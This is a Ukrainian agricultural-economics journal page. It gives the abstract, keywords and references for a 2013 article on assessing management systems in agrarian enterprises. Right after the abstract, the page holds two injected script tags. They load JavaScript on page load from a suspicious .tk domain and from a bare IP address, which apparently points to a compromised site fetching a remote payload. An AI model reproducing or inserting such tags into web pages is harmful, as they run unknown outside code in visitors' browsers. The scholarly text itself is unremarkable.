ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.164:65.014.1
Аграрний ринок

Методологічні аспекти оцінки рівня системи управління в аграрних підприємствах / Ястреб М. П. // Економіка АПК. - 2013. - № 1 - С. 61

Уточнено семасіологічний зміст категорії «управління», обгрунтовуються компоненти, які утворюють систему управління в аграрних підприємствах, пропонується один із варіантів комплексної оцінки рівня системи управління в господарюючих суб’єктах АПК. Табл.: 1. Рис.: 2. Бібліогр.: 5.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: управління, агропромисловий комплекс, господарюючі суб’єкти, комплексна оцінка системи управління

Список використаних джерел

  1. Дем ’яненко С.І. Менеджмент аграрних підприємств: навч. посіб. / С.І. Дем’яненко. - К.: КНЕУ, 2005. - 348 с.
  2. Заводський Й.С. Менеджмент: підручник у 2 т. - Т. 2 / И.С. Завадський. - К.: Вид-во Європейського ун-ту, 2002. - 640 с.
  3. Осовська Г.В. Менеджмент організацій: навч. посіб. / Г.В. Осовська, О.А. Косовський. - К.: Кондор, 2007. - 676 с.
  4. Романова Л.В. Управління підприємницькою діяльністю: навч. посіб. / Л.В. Романова. - К.: Центр навч. літ-ри, 2006. - 240 с.
  5. ШегдаА.В. Менеджмент: навч. посіб. / А.В. Шегда. - К.: Товариство «Знання», КОО, 2002. - 584 с.
Читати статтю: 13_01_09.pdf